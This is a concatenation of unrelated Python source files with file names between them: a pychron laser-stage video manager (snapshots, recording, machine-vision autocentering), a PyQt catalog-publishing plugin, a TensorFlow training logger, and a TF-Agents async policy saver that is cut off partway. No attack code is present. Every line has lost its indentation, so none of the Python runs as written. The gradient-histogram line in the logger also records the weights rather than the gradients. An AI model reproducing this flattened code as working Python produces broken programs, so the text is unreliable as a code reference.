# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Instance, String, Property, Button, Bool, Event, on_trait_change, Str, Float, Enum, Int
from apptools.preferences.preference_binding import bind_preference
from skimage.color import gray2rgb
from skimage.draw import circle_perimeter, line
import yaml
import os
import shutil
import time
from threading import Timer, Event as TEvent
from numpy import copy
from pychron.core.ui.thread import sleep
from pychron.canvas.canvas2D.camera import Camera, YamlCamera, BaseCamera
from pychron.core.helpers.binpack import pack, encode_blob
from pychron.core.helpers.filetools import unique_path, unique_path_from_manifest
from pychron.core.ui.stage_component_editor import VideoComponentEditor
from pychron.image.video import Video, pil_save
from pychron.mv.lumen_detector import LumenDetector
from pychron.paths import paths
from .stage_manager import StageManager
from pychron.core.ui.thread import Thread as QThread
try:
from pychron.canvas.canvas2D.video_laser_tray_canvas import \
VideoLaserTrayCanvas
except ImportError:
from pychron.canvas.canvas2D.laser_tray_canvas import \
LaserTrayCanvas as VideoLaserTrayCanvas
class VideoStageManager(StageManager):
"""
"""
video = Instance(Video)
camera = Instance(BaseCamera)
canvas_editor_klass = VideoComponentEditor
camera_zoom_coefficients = Property(String(enter_set=True, auto_set=False),
depends_on='_camera_zoom_coefficients')
_camera_zoom_coefficients = String
use_auto_center_interpolation = Bool(False)
configure_camera_device_button = Button
autocenter_button = Button('AutoCenter')
configure_autocenter_button = Button('Configure')
autocenter_manager = Instance(
'pychron.mv.autocenter_manager.AutoCenterManager')
autofocus_manager = Instance(
'pychron.mv.focus.autofocus_manager.AutoFocusManager')
# zoom_calibration_manager = Instance(
# 'pychron.mv.zoom.zoom_calibration.ZoomCalibrationManager')
snapshot_button = Button('Snapshot')
snapshot_mode = Enum('Single', '3 Burst', '10 Burst')
auto_save_snapshot = Bool(True)
record = Event
record_label = Property(depends_on='is_recording')
is_recording = Bool
use_db = False
use_video_archiver = Bool(True)
video_archiver = Instance('pychron.core.helpers.archiver.Archiver')
video_identifier = Str
# use_video_server = Bool(False)
# video_server_port = Int
# video_server_quality = Int
# video_server = Instance('pychron.image.video_server.VideoServer')
use_media_storage = Bool(False)
auto_upload = Bool(False)
keep_local_copy = Bool(False)
lumen_detector = Instance(LumenDetector)
render_with_markup = Bool(False)
burst_delay = Int(250)
_auto_correcting = False
stop_timer = Event
pxpermm = Float(23)
_measure_grain_t = None
_measure_grain_evt = None
grain_polygons = None
# test_button = Button
# _test_state = False
# def _test_button_fired(self):
# if self._test_state:
# # self.stop_measure_grain_polygon()
# #
# # time.sleep(2)
# #
# # d = self.get_grain_polygon_blob()
# # print d
# self.parent.disable_laser()
# else:
# self.parent.luminosity_degas_test()
# # self.start_measure_grain_polygon()
# self._test_state = not self._test_state
def motor_event_hook(self, name, value, *args, **kw):
if name == 'zoom':
self._update_zoom(value)
def bind_preferences(self, pref_id):
self.debug('binding preferences')
super(VideoStageManager, self).bind_preferences(pref_id)
if self.autocenter_manager:
self.autocenter_manager.bind_preferences(pref_id)
# bind_preference(self.autocenter_manager, 'use_autocenter',
# '{}.use_autocenter'.format(pref_id))
bind_preference(self, 'render_with_markup',
'{}.render_with_markup'.format(pref_id))
bind_preference(self, 'burst_delay',
'{}.burst_delay'.format(pref_id))
bind_preference(self, 'auto_upload', '{}.auto_upload'.format(pref_id))
bind_preference(self, 'use_media_storage', '{}.use_media_storage'.format(pref_id))
bind_preference(self, 'keep_local_copy', '{}.keep_local_copy'.format(pref_id))
bind_preference(self, 'use_video_archiver',
'{}.use_video_archiver'.format(pref_id))
bind_preference(self, 'video_identifier',
'{}.video_identifier'.format(pref_id))
bind_preference(self, 'use_video_server',
'{}.use_video_server'.format(pref_id))
bind_preference(self.video_archiver, 'archive_months',
'{}.video_archive_months'.format(pref_id))
bind_preference(self.video_archiver, 'archive_days',
'{}.video_archive_days'.format(pref_id))
bind_preference(self.video_archiver, 'archive_hours',
'{}.video_archive_hours'.format(pref_id))
bind_preference(self.video_archiver, 'root',
'{}.video_directory'.format(pref_id))
# bind_preference(self.video, 'output_mode',
# '{}.video_output_mode'.format(pref_id))
# bind_preference(self.video, 'ffmpeg_path',
# '{}.ffmpeg_path'.format(pref_id))
def get_grain_polygon(self):
ld = self.lumen_detector
l, m = ld.lum()
return m.tostring()
def get_grain_polygon_blob(self):
# self.debug('Get grain polygons n={}'.format(len(self.grain_polygons)))
try:
t, md, p = next(self.grain_polygons)
a = pack('ff', ((t, md),))
b = pack('HH', p)
return encode_blob(a + b)
except (StopIteration, TypeError) as e:
self.debug('No more grain polygons. {}'.format(e))
def stop_measure_grain_polygon(self):
self.debug('Stop measure polygons {}'.format(self._measure_grain_evt))
if self._measure_grain_evt:
self._measure_grain_evt.set()
return True
def start_measure_grain_polygon(self):
self._measure_grain_evt = evt = TEvent()
def _measure_grain_polygon():
ld = self.lumen_detector
dim = self.stage_map.g_dimension
ld.pxpermm = self.pxpermm
self.debug('Starting measure grain polygon')
masks = []
display_image = self.autocenter_manager.display_image
mask_dim = dim * 1.05
mask_dim_mm = mask_dim * self.pxpermm
ld.grain_measuring = True
while not evt.is_set():
src = self._get_preprocessed_src()
if src is not None:
targets = ld.find_targets(display_image, src, dim, mask=mask_dim,
search={'start_offset_scalar': 1})
if targets:
t = time.time()
targets = [(t, mask_dim_mm, ti.poly_points.tolist()) for ti in targets]
masks.extend(targets)
sleep(0.1)
ld.grain_measuring = False
self.grain_polygons = (m for m in masks)
self.debug('exiting measure grain')
self._measure_grain_t = QThread(target=_measure_grain_polygon)
self._measure_grain_t.start()
return True
def start_recording(self, path=None, use_dialog=False, basename='vm_recording', **kw):
"""
"""
directory = None
if os.path.sep in basename:
args = os.path.split(basename)
directory, basename = os.path.sep.join(args[:-1]), args[-1]
if path is None:
if use_dialog:
path = self.save_file_dialog()
else:
vd = self.video_archiver.root
self.debug('video archiver root {}'.format(vd))
if not vd:
vd = paths.video_dir
if directory:
vd = os.path.join(vd, directory)
if not os.path.isdir(vd):
os.mkdir(vd)
path = unique_path_from_manifest(vd, basename, extension='avi')
kw['path'] = path
kw['basename'] = basename
self._start_recording(**kw)
self.is_recording = True
return path
def stop_recording(self, user='remote', delay=None):
"""
"""
def close():
self.is_recording = False
self.info('stop video recording')
p = self.video.output_path
if self.video.stop_recording(wait=True):
if self.auto_upload:
try:
p = self._upload(p, inform=False)
except BaseException as e:
self.critical('Failed uploading {}. error={}'.format(p, e))
return p
if self.video.is_recording():
if delay:
t = Timer(delay, close)
t.start()
else:
return close()
@property
def video_configuration_path(self):
if self.configuration_dir_path:
return os.path.join(self.configuration_dir_path, 'camera.yaml')
def initialize_video(self):
if self.video:
identifier = 0
p = self.video_configuration_path
if os.path.isfile(p):
with open(p, 'r') as rfile:
yd = yaml.load(rfile)
vid = yd['Device']
identifier = vid.get('identifier', 0)
self.video.open(identifier=identifier)
self.video.load_configuration(p)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def initialize_stage(self):
super(VideoStageManager, self).initialize_stage()
self.initialize_video()
# s = self.stage_controller
# if s.axes:
# xa = s.axes['x'].drive_ratio
# ya = s.axes['y'].drive_ratio
# self._drive_xratio = xa
# self._drive_yratio = ya
self._update_zoom(0)
def autocenter(self, *args, **kw):
return self._autocenter(*args, **kw)
def snapshot(self, path=None, name=None, auto=False, inform=True, return_blob=False,
pic_format='.jpg', include_raw=True):
"""
path: abs path to use
name: base name to use if auto saving in default dir
auto: force auto save
returns:
path: local abs path
upath: remote abs path
"""
if path is None:
if self.auto_save_snapshot or auto:
if name is None:
name = 'snapshot'
path = unique_path_from_manifest(paths.snapshot_dir, name, pic_format)
elif name is not None:
if not os.path.isdir(os.path.dirname(name)):
path = unique_path_from_manifest(paths.snapshot_dir, name, pic_format)
else:
path = name
else:
path = self.save_file_dialog()
if path:
self.info('saving snapshot {}'.format(path))
# play camera shutter sound
# play_sound('shutter')
if include_raw:
frame = self.video.get_cached_frame()
head, _ = os.path.splitext(path)
raw_path = '{}.tif'.format(head)
pil_save(frame, raw_path)
self._render_snapshot(path)
if self.auto_upload:
if include_raw:
self._upload(raw_path)
upath = self._upload(path, inform=inform)
if upath is None:
upath = ''
if inform:
if self.keep_local_copy:
self.information_dialog('Snapshot saved: "{}".\nUploaded : "{}"'.format(path, upath))
else:
self.information_dialog('Snapshot uploaded to "{}"'.format(upath))
else:
upath = None
if inform:
self.information_dialog('Snapshot saved to "{}"'.format(path))
if return_blob:
with open(path, 'rb') as rfile:
im = rfile.read()
return path, upath, im
else:
return path, upath
def kill(self):
"""
"""
super(VideoStageManager, self).kill()
if self.camera:
self.camera.save_calibration()
self.stop_timer = True
self.canvas.close_video()
if self.video:
self.video.close(force=True)
# if self.use_video_server:
# self.video_server.stop()
# if self._stage_maps:
# for s in self._stage_maps:
# s.dump_correction_file()
self.clean_video_archive()
def clean_video_archive(self):
if self.use_video_archiver:
self.info('Cleaning video directory')
self.video_archiver.clean(('manifest.yaml',))
def is_auto_correcting(self):
return self._auto_correcting
crop_width = 5
crop_height = 5
def get_scores(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
return ld.get_scores(src, **kw)
def find_lum_peak(self, min_distance, blur, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.stage_map.g_dimension
mask_dim = dim * 1.05
# mask_dim_mm = mask_dim * self.pxpermm
if src is not None and src.ndim >= 2:
return ld.find_lum_peak(src, dim, mask_dim,
blur=blur,
min_distance=min_distance, **kw)
def get_brightness(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.stage_map.g_dimension
return ld.get_value(src, dim, **kw)
# src = self.video.get_cached_frame()
# csrc = copy(src)
# src, v = ld.get_value(csrc, **kw)
# return csrc, src, v
def get_frame_size(self):
cw = 2 * self.crop_width * self.pxpermm
ch = 2 * self.crop_height * self.pxpermm
return cw, ch
def close_open_images(self):
if self.autocenter_manager:
self.autocenter_manager.close_open_images()
def finish_move_to_hole(self, user_entry):
self.debug('finish move to hole')
# if user_entry and not self.keep_images_open:
# self.close_open_images()
def get_preprocessed_src(self):
return self._get_preprocessed_src()
# private
def _get_preprocessed_src(self):
ld = self.lumen_detector
src = copy(self.video.get_cached_frame())
dim = self.stage_map.g_dimension
ld.pxpermm = self.pxpermm
offx, offy = self.canvas.get_screen_offset()
cropdim = dim * 2.5
if src is not None:
if len(src.shape):
src = ld.crop(src, cropdim, cropdim, offx, offy, verbose=False)
return src
def _stage_map_changed_hook(self):
self.lumen_detector.hole_radius = self.stage_map.g_dimension
def _upload(self, src, inform=True):
if not self.use_media_storage:
msg = 'Use Media Storage not enabled in Laser preferences'
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
else:
srv = 'pychron.media_storage.manager.MediaStorageManager'
msm = self.parent.application.get_service(srv)
if msm is not None:
d = os.path.split(os.path.dirname(src))[-1]
dest = os.path.join(self.parent.name, d,
os.path.basename(src))
msm.put(src, dest)
if not self.keep_local_copy:
self.debug('removing {}'.format(src))
if src.endswith('.avi'):
head, ext = os.path.splitext(src)
vd = '{}-images'.format(head)
self.debug('removing video build directory {}'.format(vd))
shutil.rmtree(vd)
os.remove(src)
dest = '{}/{}'.format(msm.get_base_url(), dest)
return dest
else:
msg = 'Media Storage Plugin not enabled'
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
def _render_snapshot(self, path):
from chaco.plot_graphics_context import PlotGraphicsContext
c = self.canvas
p = None
was_visible = False
if not self.render_with_markup:
p = c.show_laser_position
c.show_laser_position = False
if self.points_programmer.is_visible:
c.hide_all()
was_visible = True
gc = PlotGraphicsContext((int(c.outer_width), int(c.outer_height)))
c.do_layout()
gc.render_component(c)
# gc.save(path)
from pychron.core.helpers import save_gc
save_gc.save(gc, path)
if p is not None:
c.show_laser_position = p
if was_visible:
c.show_all()
def _start_recording(self, path, basename):
self.info('start video recording {}'.format(path))
d = os.path.dirname(path)
if not os.path.isdir(d):
self.warning('invalid directory {}'.format(d))
self.warning('using default directory')
path, _ = unique_path(paths.video_dir, basename,
extension='avi')
self.info('saving recording to path {}'.format(path))
# if self.use_db:
# db = self.get_video_database()
# db.connect()
#
# v = db.add_video_record(rid=basename)
# db.add_path(v, path)
# self.info('saving {} to database'.format(basename))
# db.commit()
video = self.video
crop_to_hole = True
dim = self.stage_map.g_dimension
cropdim = dim * 8 * self.pxpermm
color = self.canvas.crosshairs_color.getRgb()[:3]
r = int(self.canvas.get_crosshairs_radius() * self.pxpermm)
# offx, offy = self.canvas.get_screen_offset()
def renderer(p):
# cw, ch = self.get_frame_size()
frame = video.get_cached_frame()
if frame is not None:
if not len(frame.shape):
return
frame = copy(frame)
# ch, cw, _ = frame.shape
# ch, cw = int(ch), int(cw)
if crop_to_hole:
frame = video.crop(frame, 0, 0, cropdim, cropdim)
if self.render_with_markup:
# draw crosshairs
if len(frame.shape) == 2:
frame = gray2rgb(frame)
ch, cw, _ = frame.shape
ch, cw = int(ch), int(cw)
y = ch // 2
x = cw // 2
cp = circle_perimeter(y, x, r, shape=(ch, cw))
frame[cp] = color
frame[line(y, 0, y, x - r)] = color # left
frame[line(y, x + r, y, int(cw) - 1)] = color # right
frame[line(0, x, y - r, x)] = color # bottom
frame[line(y + r, x, int(ch) - 1, x)] = color # top
if frame is not None:
pil_save(frame, p)
self.video.start_recording(path, renderer)
def _move_to_hole_hook(self, holenum, correct, autocentered_position):
args = holenum, correct, autocentered_position
self.debug('move to hole hook holenum={}, '
'correct={}, autocentered_position={}'.format(*args))
if correct:
ntries = 1 if autocentered_position else 3
self._auto_correcting = True
try:
self._autocenter(holenum=holenum, ntries=ntries, save=True)
except BaseException as e:
self.critical('Autocentering failed. {}'.format(e))
self._auto_correcting = False
# def find_center(self):
# ox, oy = self.canvas.get_screen_offset()
# rpos, src = self.autocenter_manager.calculate_new_center(
# self.stage_controller.x,
# self.stage_controller.y,
# ox, oy,
# dim=self.stage_map.g_dimension, open_image=False)
#
# return rpos, src
# def find_target(self):
# if self.video:
# ox, oy = self.canvas.get_screen_offset()
# src = self.video.get_cached_frame()
#
# ch = cw = self.pxpermm * self.stage_map.g_dimension * 2.5
# src = self.video.crop(src, ox, oy, cw, ch)
# return self.lumen_detector.find_target(src)
#
# def find_best_target(self):
# if self.video:
# src = self.video.get_cached_frame()
# src = self.autocenter_manager.crop(src)
# return self.lumen_detector.find_best_target(src)
def _autocenter(self, holenum=None, ntries=3, save=False, inform=False):
self.debug('do autocenter')
rpos = None
interp = False
sm = self.stage_map
st = time.time()
if self.autocenter_manager.use_autocenter:
time.sleep(0.1)
dim = sm.g_dimension
shape = sm.g_shape
if holenum is not None:
hole = sm.get_hole(holenum)
if hole is not None:
dim = hole.dimension
shape = hole.shape
ox, oy = self.canvas.get_screen_offset()
for ti in range(max(1, ntries)):
# use machine vision to calculate positioning error
rpos = self.autocenter_manager.calculate_new_center(
self.stage_controller.x,
self.stage_controller.y,
ox, oy,
dim=dim,
shape=shape)
if rpos is not None:
self.linear_move(*rpos, block=True,
source='autocenter',
use_calibration=False,
update_hole=False,
velocity_scalar=0.1)
time.sleep(0.1)
else:
self.snapshot(auto=True,
name='pos_err_{}_{}'.format(holenum, ti),
inform=inform)
break
# if use_interpolation and rpos is None:
# self.info('trying to get interpolated position')
# rpos = sm.get_interpolated_position(holenum)
# if rpos:
# s = '{:0.3f},{:0.3f}'
# interp = True
# else:
# s = 'None'
# self.info('interpolated position= {}'.format(s))
if rpos:
corrected = True
# add an adjustment value to the stage map
if save and holenum is not None:
sm.set_hole_correction(holenum, *rpos)
sm.dump_correction_file()
# f = 'interpolation' if interp else 'correction'
else:
# f = 'uncorrected'
corrected = False
if holenum is not None:
hole = sm.get_hole(holenum)
if hole:
rpos = hole.nominal_position
self.debug('Autocenter duration ={}'.format(time.time() - st))
return rpos, corrected, interp
# ===============================================================================
# views
# ===============================================================================
# ===============================================================================
# view groups
# ===============================================================================
# ===============================================================================
# handlers
# ===============================================================================
def _configure_camera_device_button_fired(self):
if self.video:
self.video.load_configuration(self.video_configuration_path)
if hasattr(self.video.cap, 'reload_configuration'):
self.video.cap.reload_configuration(self.video_configuration_path)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def _update_zoom(self, v):
if self.camera:
self._update_xy_limits()
@on_trait_change('parent:motor_event')
def _update_motor(self, new):
print('motor event', new, self.canvas, self.canvas.camera)
# s = self.stage_controller
if self.camera:
if not isinstance(new, (int, float)):
args, _ = new
name, v = args[:2]
else:
name = 'zoom'
v = new
if name == 'zoom':
self._update_xy_limits()
# pxpermm = self.canvas.camera.set_limits_by_zoom(v, s.x, s.y)
# self.pxpermm = pxpermm
elif name == 'beam':
self.lumen_detector.beam_radius = v / 2.0
def _pxpermm_changed(self, new):
if self.autocenter_manager:
self.autocenter_manager.pxpermm = new
self.lumen_detector.pxpermm = new
# self.lumen_detector.mask_radius = new*self.stage_map.g_dimension
def _autocenter_button_fired(self):
self.goto_position(self.calibrated_position_entry, autocenter_only=True)
# def _configure_autocenter_button_fired(self):
# info = self.autocenter_manager.edit_traits(view='configure_view',
# kind='livemodal')
# if info.result:
# self.autocenter_manager.dump_detector()
def _snapshot_button_fired(self):
n = 1
if self.snapshot_mode == '3 Burst':
n = 3
elif self.snapshot_mode == '10 Burst':
n = 10
bd = self.burst_delay * 0.001
delay = n > 1
for i in range(n):
st = time.time()
self.snapshot(inform=False)
if delay:
time.sleep(max(0, bd - time.time() + st))
def _record_fired(self):
# time.sleep(4)
# self.stop_recording()
if self.is_recording:
self.stop_recording()
else:
self.start_recording()
def _use_video_server_changed(self):
if self.use_video_server:
self.video_server.start()
else:
self.video_server.stop()
def _get_camera_zoom_coefficients(self):
return self.camera.zoom_coefficients
def _set_camera_zoom_coefficients(self, v):
self.camera.zoom_coefficients = ','.join(map(str, v))
self._update_xy_limits()
def _validate_camera_zoom_coefficients(self, v):
try:
return list(map(float, v.split(',')))
except ValueError:
pass
def _update_xy_limits(self):
z = 0
if self.parent is not None:
zoom = self.parent.get_motor('zoom')
if zoom is not None:
z = zoom.data_position
x = self.stage_controller.get_current_position('x')
y = self.stage_controller.get_current_position('y')
if self.camera:
pxpermm = self.camera.set_limits_by_zoom(z, x, y, self.canvas)
self.pxpermm = pxpermm
self.debug('updated xy limits zoom={}, pxpermm={}'.format(z, pxpermm))
self.canvas.request_redraw()
def _get_record_label(self):
return 'Start Recording' if not self.is_recording else 'Stop'
# ===============================================================================
# factories
# ===============================================================================
def _canvas_factory(self):
"""
"""
v = VideoLaserTrayCanvas(stage_manager=self,
padding=30)
return v
def _canvas_editor_factory(self):
e = super(VideoStageManager, self)._canvas_editor_factory()
e.stop_timer = 'stop_timer'
return e
# ===============================================================================
# defaults
# ===============================================================================
def _camera_default(self):
klass = YamlCamera
# p = os.path.join(self.configuration_dir_path, 'camera.yaml')
p = self.video_configuration_path
if p is not None:
if not os.path.isfile(p):
klass = Camera
pp = os.path.join(self.configuration_dir_path, 'camera.cfg')
if not os.path.isfile(pp):
self.warning_dialog('No Camera configuration file a {} or {}'.format(p, pp))
p = pp
camera = klass()
camera.load(p)
else:
camera = Camera()
camera.set_limits_by_zoom(0, 0, 0, self.canvas)
self._camera_zoom_coefficients = camera.zoom_coefficients
return camera
def _lumen_detector_default(self):
ld = LumenDetector()
ld.pixel_depth = self.video.pixel_depth
return ld
def _video_default(self):
v = Video()
self.canvas.video = v
return v
def _video_server_default(self):
from pychron.image.video_server import VideoServer
return VideoServer(video=self.video)
def _video_archiver_default(self):
from pychron.core.helpers.archiver import Archiver
return Archiver()
def _autocenter_manager_default(self):
if self.parent.mode != 'client':
# from pychron.mv.autocenter_manager import AutoCenterManager
if 'co2' in self.parent.name.lower():
from pychron.mv.autocenter_manager import CO2AutocenterManager
klass = CO2AutocenterManager
else:
from pychron.mv.autocenter_manager import DiodeAutocenterManager
klass = DiodeAutocenterManager
return klass(video=self.video,
canvas=self.canvas,
application=self.application)
def _autofocus_manager_default(self):
if self.parent.mode != 'client':
from pychron.mv.focus.autofocus_manager import AutoFocusManager
return AutoFocusManager(video=self.video,
laser_manager=self.parent,
stage_controller=self.stage_controller,
canvas=self.canvas,
application=self.application)
# def _zoom_calibration_manager_default(self):
# if self.parent.mode != 'client':
# from pychron.mv.zoom.zoom_calibration import ZoomCalibrationManager
# return ZoomCalibrationManager(laser_manager=self.parent)
# ===============================================================================
# calcualte camera params
# ===============================================================================
# def _calculate_indicator_positions(self, shift=None):
# ccm = self.camera_calibration_manager
#
# zoom = self.parent.zoom
# pychron, name = self.video_manager.snapshot(identifier=zoom)
# ccm.image_factory(pychron=pychron)
#
# ccm.process_image()
# ccm.title = name
#
# cond = Condition()
# ccm.cond = cond
# cond.acquire()
# do_later(ccm.edit_traits, view='snapshot_view')
# if shift:
# self.stage_controller.linear_move(*shift, block=False)
#
# cond.wait()
# cond.release()
#
# def _calculate_camera_parameters(self):
# ccm = self.camera_calibration_manager
# self._calculate_indicator_positions()
# if ccm.result:
# if self.calculate_offsets:
# rdxmm = 5
# rdymm = 5
#
# x = self.stage_controller.x + rdxmm
# y = self.stage_controller.y + rdymm
# self.stage_controller.linear_move(x, y, block=True)
#
# time.sleep(2)
#
# polygons1 = ccm.polygons
# x = self.stage_controller.x - rdxmm
# y = self.stage_controller.y - rdymm
# self._calculate_indicator_positions(shift=(x, y))
#
# polygons2 = ccm.polygons
#
# # compare polygon sets
# # calculate pixel displacement
# dxpx = sum([sum([(pts1.x - pts2.x)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
# dypx = sum([sum([(pts1.y - pts2.y)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
#
# # convert pixel displacement to mm using defined mapping
# dxmm = dxpx / self.pxpercmx
# dymm = dypx / self.pxpercmy
#
# # calculate drive offset. ratio of request/actual
# try:
# self.drive_xratio = rdxmm / dxmm
# self.drive_yratio = rdymm / dymm
# except ZeroDivisionError:
# self.drive_xratio = 100
#
# def _calibration_manager_default(self):
#
# # self.video.open(user = 'calibration')
# return CalibrationManager(parent = self,
# laser_manager = self.parent,
# video_manager = self.video_manager,
# )
# ============= EOF ====================================
# adxs = []
# adys = []
# for p1, p2 in zip(polygons, polygons2):
# # dxs = []
# # dys = []
# # for pts1, pts2 in zip(p1.points, p2.points):
# #
# # dx = pts1.x - pts2.x
# # dy = pts1.y - pts2.y
# # dxs.append(dx)
# # dys.append(dy)
# # dxs = [(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]
# # dys = [(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]
# #
# adx = sum([(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# ady = sum([(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
#
# # adx = sum(dxs) / len(dxs)
# # ady = sum(dys) / len(dys)
# adxs.append(adx)
# adys.append(ady)
# print 'xffset', sum(adxs) / len(adxs)
# print 'yffset', sum(adys) / len(adys)
|
__init__.py
|
from PyQt4 import QtCore, QtGui
from pluginmgr import Tool
import multiprocessing
import queue
import sys, os
class Plugin(Tool):
_proc = None
_action = None
def action(self):
if self._action is None:
self._action = QtGui.QAction("Publish Catalog", None)
self._action.setCheckable(True)
self._action.triggered.connect(self.publish)
return self._action
def check_url (self):
publisher = __import__('publisher')
try:
data = publisher.queue.get(False)
if data is not None:
if 'url' in data:
QtGui.QMessageBox.information(None, \
'Catalog published', \
'You can access your catalog on: %s'%data['url'], \
QtGui.QMessageBox.Ok, \
QtGui.QMessageBox.NoButton, \
QtGui.QMessageBox.NoButton)
elif 'error' in data:
print(("Error publishing catalog: %s"%data['error']))
QtGui.QMessageBox.critical(self, \
'Failed to publish catalog', \
'An error ocurred while trying to publish your catalog.')
self.timer.stop()
except queue.Empty:
pass
def publish(self, checked):
print(("Publish: ", checked))
if not checked and self._proc:
print("Stopping OPDS server")
self._proc.terminate()
self._proc = None
return
if not self._proc:
dirname = os.path.join(
os.path.abspath(
os.path.dirname(__file__)))
sys.path.append(dirname)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.check_url)
self.timer.start(1000)
publisher = __import__('publisher')
self._proc = multiprocessing.Process(target = publisher.real_publish)
self._proc.daemon = True
self._proc.start()
|
model_logging.py
|
import tensorflow as tf
import numpy as np
import scipy.misc
import threading
try:
from StringIO import StringIO # Python 2.7
except ImportError:
from io import BytesIO # Python 3.x
class Logger:
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None):
self.trainer = trainer
self.log_interval = log_interval
self.validation_interval = validation_interval
self.generate_interval = generate_interval
self.accumulated_loss = 0
self.generate_function = generate_function
if self.generate_function is not None:
self.generate_thread = threading.Thread(target=self.generate_function)
self.generate_function.daemon = True
def log(self, current_step, current_loss):
self.accumulated_loss += current_loss
if current_step % self.log_interval == 0:
self.log_loss(current_step)
self.accumulated_loss = 0
if current_step % self.validation_interval == 0:
self.validate(current_step)
if current_step % self.generate_interval == 0:
self.generate(current_step)
def log_loss(self, current_step):
avg_loss = self.accumulated_loss / self.log_interval
print("loss at step " + str(current_step) + ": " + str(avg_loss))
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
print("validation loss: " + str(avg_loss))
print("validation accuracy: " + str(avg_accuracy * 100) + "%")
def generate(self, current_step):
if self.generate_function is None:
return
if self.generate_thread.is_alive():
print("Last generate is still running, skipping this one")
else:
self.generate_thread = threading.Thread(target=self.generate_function,
args=[current_step])
self.generate_thread.daemon = True
self.generate_thread.start()
# Code referenced from https://gist.github.com/gyglim/1f8dfb1b5c82627ae3efcfbbadb9f514
class TensorboardLogger(Logger):
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None,
log_dir='logs'):
super().__init__(log_interval, validation_interval, generate_interval, trainer, generate_function)
self.writer = tf.summary.create_file_writer(log_dir)
def log_loss(self, current_step):
# loss
avg_loss = self.accumulated_loss / self.log_interval
with self.writer.as_default():
tf.summary.scalar('loss', avg_loss, step=current_step)
# parameter histograms
for tag, value, in self.trainer.model.named_parameters():
tag = tag.replace('.', '/')
tf.summary.histogram(tag, value.data.cpu().numpy(), step=current_step, buckets=200)
if value.grad is not None:
tf.summary.histogram(tag + '/grad', value.data.cpu().numpy(), step=current_step, buckets=200)
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
with self.writer.as_default():
tf.summary.scalar('validation loss', avg_loss, step=current_step)
tf.summary.scalar('validation accuracy', avg_accuracy, step=current_step)
|
async_policy_saver.py
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Async helper for the policy saver."""
import threading
from typing import Text
from absl import logging
from tf_agents.policies import policy_saver as policy_saver_module
class AsyncPolicySaver(object):
"""Triggers `policy_saver` save calls in a separate thread asynchronously."""
def __init__(self, policy_saver: policy_saver_module.PolicySaver):
"""Initialize an AsyncPolicySaver.
Args:
policy_saver: An instance of a `policy_saver.PolicySaver`.
"""
self._policy_saver = policy_saver
self._save_condition_variable = threading.Condition()
# These vars should only be accessed if the lock in save_condition is held.
# export_dir is set to None whenever there is no pending save. Otherwise it
# is used to communicate across threads.
self._export_dir = None
self._saving_checkpoint = False
self._join_save_thread = False
self._save_thread = threading.Thread(target=self._save_loop)
self._save_thread.start()
def _save_loop(self):
"""Helper method for the saving thread to wait and execute save requests."""
while True:
with self._save_condition_variable:
while not self._export_dir:
self._save_condition_variable.wait()
if self._join_save_thread:
return
if self._saving_checkpoint:
logging.info("Saving checkpoint to %s", self._export_dir)
self._policy_saver.save_checkpoint(self._export_dir)
else:
logging.info("Saving policy to %s", self._export_dir)
self._policy_saver.save(self._export_dir)
self._export_dir = None
self._save_condition_variable.notify()
def _assert_save_thread_is_alive(self):
if self._join_save_thread or not self._save_thread.is_alive():
raise ValueError("Saving thread in AsyncPolicySaver is not alive. Either "
"an exception has occured while saving, or the saver "
"was closed.")
def save(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy to the given `export_dir`.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the `saved_model` of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=False, blocking=blocking)
def save_checkpoint(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy checkpoint.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the checkpoint of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=True, blocking=blocking)
def _save(self, export_dir, saving_checkpoint, blocking):
"""Helper save method, generalizes over save and save_checkpoint."""
self._assert_save_thread_is_alive()
if blocking:
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
